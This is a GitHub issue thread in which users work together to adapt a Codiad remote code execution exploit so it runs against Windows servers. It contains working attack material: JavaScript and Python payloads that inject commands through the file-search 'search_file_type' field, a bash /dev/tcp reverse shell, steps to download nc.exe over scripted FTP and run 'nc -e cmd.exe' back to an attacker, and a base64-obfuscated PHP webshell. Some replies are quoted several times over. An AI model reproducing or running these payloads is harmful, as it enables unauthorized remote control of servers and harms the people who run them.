Open REPTILEHAUS opened 6 years ago
Hi, guy actually, I haven't tested this payload on any windows server, it works on Linux. but now I am a little busy, so I will tell you how to find the reason for this error. if you have learned PHP language, you will be able to debug this error. for solving this problem, you should use debug functions of PHP language, such as print_r, var_dump... and see how this error occurred. thank you.
i got the same error that REPTILEHAUS gets.
@ozgur2357 okay, I got it, I will review it right now, thank you for reporting
@ozgur2357 Could you offer me some information about your operation system version or php version or codiad version, that will do a lot help for solving this problem. thank you, bro
@WangYihang of course, Windows 7 Professional Edition Service Pack 1, php version 5.6.12 with xampp
look, I just change the source code of file: ROOT/components/filenmanager/class.filemanager.php#line244
then use the exploit.js to exploit it, and the browser reported that:
<br />
<b>Notice</b>: Undefined index: type in <b>C:\phpStudy\PHPTutorial\WWW\components\filemanager\class.filemanager.php</b> on line <b>238</b><br />
but the evil code actually has been executed.
My environment is:
php 5.4.45
windows 10
codiad 2.8.3
I got the reason, I have not add the GET arg type
in the URL
but this arg does not effect us to get a reverse shell
you can see the evil command actually been executed
The main reason that you didn't get a reverse shell is that the evil code is write for linux(cause windows does not have bash
)
This exploition is based on a tech which named command injection
but it didn't work for windows OS sometimes.
maybe we can search with such keywords command injection on windows
on web
Look, I got some way to inject command on windows platform just like this:
C:\phpStudy\PHPTutorial\WWW>find -L .\ -iregex "*" & dir & echo "*"
找不到文件 - -L
找不到文件 - .\
找不到文件 - -IREGEX
驱动器 C 中的卷没有标签。
卷的序列号是 CE19-C138
C:\phpStudy\PHPTutorial\WWW 的目录
2017/12/23 23:41 <DIR> .
2017/12/23 23:41 <DIR> ..
2017/07/26 01:53 567 .editorconfig
2017/07/26 01:53 173 .gitignore
the old exploition is designed for linux
because we are able to injection command with \n
on linux platform
ip="8.8.8.8";
port="8888";
$.get(
"/components/project/controller.php?action=get_current",
function(d){
p=JSON.parse(d)['data']['path'];
$.post(
"/components/filemanager/controller.php?action=search&path="+p,
{"search_file_type":"\"\n/bin/bash -c 'sh -i >&/dev/tcp/"+ip+"/"+port+" 0>&1'\ngrep \"",}
);
}
);
so, we just need to change the exploit to make it fit on windows
ip="8.8.8.8";
port="8888";
command="dir";
$.get(
"/components/project/controller.php?action=get_current",
function(d){
p=JSON.parse(d)['data']['path'];
$.post(
"/components/filemanager/controller.php?action=search&path="+p,
{"search_file_type":'*"&'+command+'&echo "'}
);
}
);
Unfortunately we can not get the output of this command dir
how can we prove it?
using ping, just give it a try
so I change the var command
to command="ping SERVER_IP";
then use tcpdump to listen on the server SERVER_IP
got it, now we are able to execute any command on windows platform, cool
That's so cool, let's try to find someway to get a reverse shell on window, cause windows platform does not bash, so we can not use the bash build-in function to build a revershell maybe we can use python or other binaries, or we can use powershell to generate a revershell
Hi WangYihang, yes i managed to ping the way you said, cool thanks, now i think how to get a shell now like you.
how about upload nc.exe for windows via ftp? but ftp is an interactive app.
Of course you can use nc.exe or some other binary virus You can learn how to download file with windows cmd.exe from the following url
https://superuser.com/questions/59465/is-it-possible-to-download-using-the-windows-command-line
To download a binary from a ftp server by php function shell_exec
we just need to let it type the following words
ftp 192.168.1.143
admin
admin
get nc.exe
quit
then the file will be stored at the current directory so now, we are able to get a reverse shell while using it
nc 8.8.8.8 8888 -e cmd.exe
to make it possible, cause the ftp server is an interactive app, so we should put all the commands into a temp file just like this:
admin
admin
get nc.exe
quit
how to use it, yeah, using the input stream redirection.
ftp 127.0.0.1 < command.txt
how to create the file: command.txt
just use
C:\Users\Sun\Desktop\test>echo firstline > command.txt
C:\Users\Sun\Desktop\test>echo secondline >> command.txt
C:\Users\Sun\Desktop\test>type command.txt
firstline
secondline
so, that's the solution. thank you. @ozgur2357 @REPTILEHAUS
hi Wang, so we should be able to update the code and use it for windows right? can you update your code for windows 7?
Okay, I will try it these days in many ways. On Mon, Jan 15, 2018 at 7:25 AM totoroha notifications@github.com wrote:
hi Wang, so we should be able to update the code and use it for windows right? can you update your code for windows 7?
— You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/2#issuecomment-357551771, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhAWpsOpt_xY212z942DOxLpL7vASks5tKozxgaJpZM4Q0Cen .
Hello Wang , I am really interested into this as well , do you think you will be able to rework the code anytime soon ? Any chance to have a python exploit windows based ? Many thanks !
@kienast I will try, but actually, a lot of windows server will not have python installed... so maybe we should use some cmd build-in command... to make the exploitation more robust.
No problem , just let us if someone can test this so we can have a sort of step by step guide for a windows machine , that would be awesome ! thanks
@ozgur2357 @kienast @totoroha @REPTILEHAUS Hey, guys, the Windows platform which installed Codiad (<2.8.4) now is available to be exploited. thanks for @mhaskar 's excellent work. (Python version and the JavaScript version is under development.)
@WangYihang , Thanks again man , best of luck and we will keep in touch !
Hi @mhaskar @WangYihang I am still getting an error saying Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}
My environment is Windows running CODIAD. Can you please help ?
Have edited the code as below - def exploit(domain, username, password, ip, port, path): global session url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path)
# This is the full payload for windows which escape the command string and execute the command calc.exe
# You can replace calc.exe with any command , for example you can use the following command to upload php cmd shell with cmd parameter
payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo "<?php eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7')) ?>"'''
windows_payload = 'Hacker"%26cmd.exe echo""'
data = "search_string=Hacker&search_file_type=" + windows_payload
headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}
response = session.post(url, data=data, headers=headers)
content = response.content
if content == '''{"status":"error","message":"No Results Returned"}''':
print "[-] If you see this message immediately, three reasons:"
print "\t[+] 1. You just have exited the reverse shell."
print "\t[+] 2. The target server cannot access your vps server."
print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."
Got it, I will check it tonight, and thank you for your reporting anishmi123 notifications@github.com于2018年3月12日 周一下午1:59写道:
Hi @mhaskar https://github.com/mhaskar @WangYihang https://github.com/wangyihang I am still getting an error saying Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}
My environment is Windows running CODIAD. Can you please help ?
Have edited the code as below - def exploit(domain, username, password, ip, port, path): global session url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path)
payload =
'''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ'''
This is the full payload for windows which escape the command string and
execute the command calc.exe
You can replace calc.exe with any command , for example you can use the
following command to upload php cmd shell with cmd parameter payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo ""''' windows_payload = 'Hacker"%26cmd.exe echo""' data = "search_string=Hacker&search_file_type=" + windows_payload headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=data, headers=headers) content = response.content if content == '''{"status":"error","message":"No Results Returned"}''': print "[-] If you see this message immediately, three reasons:" print "\t[+] 1. You just have exited the reverse shell." print "\t[+] 2. The target server cannot access your vps server." print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."
— You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/2#issuecomment-372201516, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhH3M3ETpaxFMpHoQfOtG31kTe2w6ks5tdg6vgaJpZM4Q0Cen .
Here are some steps may be helpful for you:
If you have already following the three steps and still not find the reason, please inform me. Finally, thank you for you report and keep in touch
Best
王一航 wangyihanger@gmail.com于2018年3月13日 周二上午9:45写道:
Got it, I will check it tonight, and thank you for your reporting anishmi123 notifications@github.com于2018年3月12日 周一下午1:59写道:
Hi @mhaskar https://github.com/mhaskar @WangYihang https://github.com/wangyihang I am still getting an error saying Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}
My environment is Windows running CODIAD. Can you please help ?
Have edited the code as below - def exploit(domain, username, password, ip, port, path): global session url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path)
payload =
'''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ'''
This is the full payload for windows which escape the command string
and execute the command calc.exe
You can replace calc.exe with any command , for example you can use the
following command to upload php cmd shell with cmd parameter payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo ""''' windows_payload = 'Hacker"%26cmd.exe echo""' data = "search_string=Hacker&search_file_type=" + windows_payload headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=data, headers=headers) content = response.content if content == '''{"status":"error","message":"No Results Returned"}''': print "[-] If you see this message immediately, three reasons:" print "\t[+] 1. You just have exited the reverse shell." print "\t[+] 2. The target server cannot access your vps server." print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."
— You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/2#issuecomment-372201516, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhH3M3ETpaxFMpHoQfOtG31kTe2w6ks5tdg6vgaJpZM4Q0Cen .
Hey man - Im coming up against this issue at the moment, any ideas